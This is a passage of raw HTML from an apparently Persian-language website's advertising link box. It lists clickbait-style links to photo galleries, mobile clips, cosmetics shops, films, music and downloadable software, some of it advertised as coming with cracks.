				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font color="#000000" face="Tahoma"><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">&nbsp;
					<font style="font-size: 8pt; text-decoration: none; font-weight: 600; color: rgb(0, 0, 0);">
					<a target="_blank" href="http://www.link.myi24.com/webmaster.htm">
					<span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">با 
					قراردادن باکس در سایت خود </span></a></font>
					<a target="_blank" href="http://www.link.myi24.com/webmaster.htm">
					<span style="font-size: 8pt; text-decoration: none; font-weight: 600; color: rgb(0, 0, 0);">
					لینک شما رایگان در اینجا قرار خواهد 
					گرفت</span></a><span style="font-size: 8pt; text-decoration: none; font-weight: 600; color: rgb(0, 0, 0);"><a target="_blank" href="http://www.link.myi24.com/webmaster.htm"><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);"> 
					.</span></a></span></span></font><span style="text-decoration: none; font-weight: 600; font-size: 8pt;"><font color="#ff0000" face="Tahoma"><span lang="fa">
				</span>آمار : + 20000 hit </font></span>
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0);">
				<font color="#000000" face="Tahoma">
				<span style="font-size: 8pt; text-decoration: none; font-weight: 600; color: rgb(0, 0, 0);">&nbsp;</span><span style="font-size: 8pt; font-weight: 600; text-decoration: none; color: rgb(0, 0, 0);"><img src="a_data/cds.gif" width="40" border="0" height="10"></span><span style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(0, 0, 0);">&nbsp; </span>
				</font></span>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="24">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a></span></font>
				<font size="2" color="#0000f9">
				<span style="font-size: 8pt; color: rgb(0, 0, 0); text-decoration: none; font-weight: 600;">
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.myi24.com/">
		<span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;">
				عکس عکس عکس عکس عکس عکس عکس عکس &nbsp;...</span></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="22">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.salamat.i24.ir/"><font color="#ff0000">
				<span style="text-decoration: none;">مخصوص زوجهای جوان </span> </font>
				<span style="text-decoration: none;">
				<font color="#0000ec">
				( حتمآ ببینید )</font></span></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<span style="font-size: 8pt; font-weight: 600;">
				<font color="#ff0000">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.bip.blogsky.com/"><font color="#000000">&nbsp; 
				عکس هاي ناب و ديدني از بازيگران ايراني</font></a></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<span style="font-weight: 600; font-size: 8pt; color: rgb(255, 0, 0); text-decoration: none;">
				<a target="_blank" href="http://cd.i24.ir/page2.htm">
				<font color="#008000" face="tahoma,tahoma">
				<span style="text-decoration: none;">1500 کلیپ خنده دار و غیره 
				برای موبایل</span></font></a></span><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;" href="http://www.orumshop.com/"><font color="#000000">&nbsp; 
				</font></a></span></font>
				<span style="font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;">
				<font color="#ff0000" face="Tahoma">
					<a target="_blank" href="http://cd.i24.ir/">
					<span style="text-decoration: none;"><font color="#0000ec">
				نرم افزار تبدیل گفتار به نوشتار</font><font color="#ff0000">
				</font><font color="#000000">( با راهنمای نصب به زبان فارسی )</font></span></a></font></span><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" face="Tahoma">&nbsp;</font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<a target="_blank" href="http://www.irteleshop.com/">
				<span style="text-decoration: none;"><font color="#ff0000">
				فروشگاه اينترنتي ایران تله شاپ </font><font color="#000000">(
				</font></span><span lang="fa"><font color="#000000">
				<span style="text-decoration: none;">با جوایز استثنائی )</span></font></span></a></font><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><span lang="en-us"><a target="_blank" href="http://www.irteleshop.com/"><font color="#000000"><span style="text-decoration: none;">&nbsp;
				</span>
				</font></a></span></font>
							</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<span style="font-size: 8pt; font-weight: 600;">
				<font color="#ff0000">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a>
				<a href="http://irstores.com/index.php?cPath=1">
				<span style="text-decoration: none;"><font color="#0000ec">یک 
				عالمه نرم افزار</font></span></a> </font>
				<span style="text-decoration: none; font-size: 8pt; font-weight: 600;">
				<a href="http://irstores.com/index.php?cPath=1">
				<font color="#0000ec"><span style="text-decoration: none;">همراه 
				با کرک</span></font></a></span><span style="text-decoration: none;"><font color="#0000ec"><span lang="fa"><font color="#ff0000"><a target="_blank" href="http://irstores.com/index.php?cPath=1"><span style="text-decoration: none;">
				</span> <font color="#000000">
				<span style="text-decoration: none;">( بیا کلیک کن حالشو ببر ... 
				)</span></font></a></font></span></font></span></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<font face="tahoma,tahoma"><span>
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.myi24.com/category/today-news/">
				<font style="font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;"> 
				به روز ترین و داغ ترین تصاویر که تا حالا جایی ندیدید .</font></a></span></font><span style="font-weight: 600; font-size: 8pt;"><font face="Tahoma"><span lang="en-us"><font color="#ff0000">&nbsp;</font></span></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="24">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a>
				<span lang="fa"><font color="#0000ec">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.yourbazar.com/">
				<span style="text-decoration: none;">بزرگترین فروشگاه وسایل 
				آرایشی و بهداشتی </span> <font color="#000000">
				<span style="text-decoration: none;">( حتمآ ببینید )</span></font></a></span></font></span></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<a href="http://www.link.myi24.com/webmaster.htm">
				<span style="text-decoration: none;"><font color="#ff0000">تبلیغ 
				رایگان در این باکس </font><font color="#000000">( برای مدت محدود 
				) </font><font color="#ff0000">&nbsp;</font></span></a></font><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><span lang="en-us"><a target="_blank" href="http://www.irteleshop.com/"><font color="#000000"><span style="text-decoration: none;">&nbsp;
				</span>
				</font></a></span></font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<span style="font-size: 8pt; font-weight: 600;">
				<font color="#ff0000">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a>
				<a href="http://irstores.com/index.php?cPath=1">
				<span style="text-decoration: none;"><font color="#0000ec">یک 
				عالمه نرم افزار</font></span></a> </font>
				<span style="text-decoration: none; font-size: 8pt; font-weight: 600;">
				<a href="http://irstores.com/index.php?cPath=1">
				<font color="#0000ec"><span style="text-decoration: none;">همراه 
				با کرک</span></font></a></span><span style="text-decoration: none;"><font color="#0000ec"><span lang="fa"><font color="#ff0000"><a target="_blank" href="http://irstores.com/index.php?cPath=1"><span style="text-decoration: none;">
				</span> <font color="#000000">
				<span style="text-decoration: none;">( بیا کلیک کن حالشو ببر ... 
				)</span></font></a></font></span></font></span></span><span style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;"><font size="2" color="#0000f9"> </font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font size="2" color="#0000f9">
				<span style="font-size: 8pt; color: rgb(0, 0, 0); text-decoration: none; font-weight: 600;">
				<a target="_blank" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;" href="http://www.myi24.com/">
				<span style="text-decoration: none; font-size: 8pt; color: rgb(255, 0, 0); font-family: Tahoma; font-weight: 600;">
				عکس عکس عکس عکس عکس عکس عکس عکس &nbsp;...</span></a></span></font><span lang="en-us"><a target="_blank" href="http://www.cd.i24.ir/"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#ff0000" face="Tahoma">&nbsp;</font></a><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; color: rgb(0, 0, 0); font-family: Tahoma;">
				<font color="#000000" face="Tahoma">
				<a target="_blank" href="http://www.cd.i24.ir/">
				<font color="#0000ec"><span style="text-decoration: none;">ابتذال 
				در سینمای ایران</span></font></a></font><font color="#ff0000" face="Tahoma">
				</font></span><font color="#ff0000" face="Tahoma">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt; font-family: Tahoma;">
				+</span><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma;">
				</span></font>
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma;">
				<font color="#000000" face="Tahoma">
				<a target="_blank" href="http://www.cd.i24.ir/">
				<font color="#000000"><span style="text-decoration: none;">ویران 
				کننده خاموش</span></font></a></font><font color="#ff0000" face="Tahoma">
				</font></span><font color="#ff0000" face="Tahoma">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt; font-family: Tahoma;">
				+</span><span style="text-decoration: none; font-weight: 600; font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma;">
				<a target="_blank" href="http://www.cd.i24.ir/">
				<font color="#000000"><span style="text-decoration: none;">جوان 
				بی نماز</span></font></a></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><font color="#ff0000" face="Tahoma">
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma; color: rgb(0, 0, 0);">
					<a target="_blank" href="http://cd.i24.ir/">
					<span><font color="#ff0000">
				<span style="text-decoration: none;">آموزش تناسب اندام و آب كردن 
				شكم</span></font></span></a></span></font><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><span lang="en-us"><font color="#0000ec">&nbsp;
				</font></span></font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a>
				<span lang="fa"><font color="#0000ec">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.salamat.i24.ir/">
				<span style="text-decoration: none;">بزرگترین فروشگاه وسایل 
				آرایشی و بهداشتی <font color="#000000">
				( حتمآ ببینید )</font></span></a></span></font></span></span></font><span style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; font-weight: 600;"><font size="2" color="#0000f9"> </font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<span style="font-weight: 600; font-size: 8pt;">
				<a target="_blank" href="http://cd.i24.ir/page2.htm">
				<font face="tahoma,tahoma">
				<span style="color: rgb(0, 128, 0); text-decoration: none;">مجموعه اي از 
				60 فیلم هندی</span></font></a></span><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				</p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="24">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<a target="_blank" href="http://cd.i24.ir/page2.htm">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				<font color="#000000" face="tahoma,tahoma">
				مجموعه کامل آموزشهای قبل از ازدواج از جمله معیارهای همسرگزینی , 
				جایگاه عشق و ....</font></span></a></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font>
				<span style="font-weight: 600; font-size: 8pt;">
				<a target="_blank" href="http://cd.i24.ir/page2.htm">
				<font color="#ff0000" face="tahoma,tahoma">
				<span style="text-decoration: none; color: rgb(255, 0, 0);">مجموعه 
				بهترين آهنگهاى سال ۱۳۸۷</span></font></a><font color="#ff0000" face="Tahoma">
				</font><font face="Tahoma">(موزیک پاپ) </font></span><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> 
				&nbsp;</font></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="24">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
		<font style="font-size: 8pt; text-decoration: none; font-weight: 600;" face="Tahoma">
				<font color="#000000">
				<a target="_blank" style="font-size: 8pt; text-decoration: none; font-weight: 600;" href="http://www.callsell.i24.ir/">
<span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				<font color="#000000">فروش کرم حلزوني اليزا با کمترين قيمت !!!</font></span><font color="#000000">&nbsp;</font></a></font></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;</font><font color="#ff0000" face="Tahoma"><a target="_blank" href="http://www.myi24.com/"><font color="#ff0000"><span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				</span></font>
				<font style="font-size: 8pt; text-decoration: none; font-weight: 600; font-family: Tahoma;" color="#ff0000">
				<span style="text-decoration: none; font-weight: 600; font-size: 8pt;">
				عکس عکس<span lang="en-us"> </span>عکس عکس عکس از هر کی بخوای</span></font></a></font><font face="tahoma,tahoma"><span style="font-size: 8pt; text-decoration: none; font-weight: 600;"><font style="font-weight: 600; font-size: 8pt; text-decoration: none; font-family: Tahoma;">&nbsp;</font></span></font><font color="#0000ec"><span lang="en-us"><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"> </font>
				</span>
				</font>
				<span style="font-size: 8pt; font-weight: 600;" lang="en-us">
				<font color="#0000f0">
				<img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
							<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" bgcolor="#ffccff" height="23">
							<p style="margin-left: 5px; margin-right: 5px;">
				<span style="font-size: 8pt; font-weight: 600;">
				<font color="#ff0000">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><font color="#000000"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;">&nbsp;</a></font></font></span><font color="#000000"><span style="text-decoration: none; font-size: 8pt; font-weight: 600;"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; text-decoration: none; font-weight: 600;"> </a>
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.myi24.com/">
				<font color="#000000"><span style="text-decoration: none;">هر چی برای سرگرمی بخوای اینجا پیدا می شه 
				...</span></font></a></span></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<font color="#ff0000">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://myi24.com/">
				<font color="#008000"><span style="text-decoration: none;">جا از 
				این راحت تر برای صحبت کردن با دوست دختر یا پسرت پیدا نمی کنی !!</span></font></a></span></font>&nbsp;
				</font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="24">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp; </font></a></span></font>
				<font face="Tahoma"><span style="font-size: 8pt;">
				<font color="#000000" face="Tahoma">
				<span style="font-weight: 600; font-size: 8pt; font-family: Tahoma; color: rgb(0, 0, 0); text-decoration: none;"> <a target="_blank" href="http://www.cd.i24.ir/">
				<font color="#000000"><span style="text-decoration: none;">عكسهاي 
				مبارزه با بد حجابي و اراذل اوباش ...</span></font></a></span></font></span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				</font><a href="http://irstores.com/index.php?cPath=4">
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none;">
				<font color="#ff0000">مهم نیست مدل گوشی</font> موبایلت چیه نرم 
				افزارش رو حتمآ اینجا پیدا می کنی ...</span></a><font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><a target="_blank" href="http://www.irteleshop.com/"><span lang="en-us"><font color="#000000"><span style="text-decoration: none;">&nbsp;</span></font></span><font color="#000000"><span style="text-decoration: none;">
				</span>
				<span style="text-decoration: none;" lang="en-us"> &nbsp;</span></font></a></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font>
				<font color="#0000ec" face="tahoma,tahoma">
				<span style="font-size: 8pt; text-decoration: none; font-weight: 600;">
				<a target="_blank" href="http://myi24.com/2008/07/09/4-way-to-say-i-love-you.html">
				<font color="#0000ec"><span style="text-decoration: none;">چهار 
				روش برای گفتن "دوستت دارم"</span></font></a></span></font><font face="tahoma,tahoma"><a target="_blank" href="http://myi24.com/2008/07/09/4-way-to-say-i-love-you.html"><span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;"> 
				( آقایون و خانم ها )</span></a><span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;"> </span>
				<span style="text-decoration: none;" lang="en-us">&nbsp;</span></font></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<span style="font-size: 8pt; font-weight: 600;">
				<font color="#ff0000">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><font color="#000000"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;">&nbsp;</a></font></font></span><font size="2" color="#0000f9"><span style="text-decoration: none; font-size: 8pt; color: rgb(0, 0, 0); font-weight: 600;"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none; font-weight: 600;"> </a>
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.myi24.com/">
				<font color="#ff0000"><span style="text-decoration: none;">گالري 
				لباس و فشن مد در ايران </span> </font></a></span><font color="#0000ec">
				&nbsp;</font></span></font><span style="font-size: 8pt; font-weight: 600;" lang="en-us"><font color="#0000f0"><img src="a_data/cds.gif" width="40" border="0" height="10"></font></span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffccff" height="23">
				<p style="margin-left: 5px; margin-right: 5px;">
				<font color="#ff0000">
				<span style="font-size: 8pt; font-weight: 600;">
				<img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"><a target="_blank" href="http://cd.i24.ir/" style="font-size: 8pt; color: rgb(0, 0, 0); font-family: Tahoma; text-decoration: none;"><font color="#000000">&nbsp;
				</font></a></span></font>
				<span style="font-weight: 600; font-size: 8pt; text-decoration: none;" lang="fa">
				<a href="http://www.cd.i24.ir/"><font color="#000000">
				<span style="text-decoration: none;">طنز مرد عنکبوتی ( مرد 
				سنجاقکی ) اگر می خواهید از خنده ... کلیک کنید </span></font></a>
				</span></p></td>
						</tr>
						<tr>
				<td style="padding: 0px; font-size: 11px; font-family: Tahoma;" dir="rtl" width="980" bgcolor="#ffffff" height="23">
				<p style="margin-right: 5px; margin-left: 5px;">
				<font style="font-weight: 600; font-size: 8pt; text-decoration: none;" color="#0000f9" face="Tahoma"><span lang="en-us"><font color="#0000ec">
				&nbsp;</font></span></font><font color="#ff0000"><span style="font-size: 8pt; font-weight: 600;"><img src="a_data/linkArrow_002.gif" width="4" border="0" height="7"></span></font><font style="font-size: 8pt; font-weight: 600;" color="#ff0000">&nbsp;
				<font color="#ff0000">
				<span style="text-decoration: none;">
				<a target="_blank" href="http://www.salamat.i24.ir/"><span style="text-decoration: none;">
				<font color="#008000">قابل 
				توجه خانم ها و آقایان ( حتمآ ببینید ) </font> </span> </a> </span></font>&nbsp;
				</font></p></td>
						</tr>
						<tr>
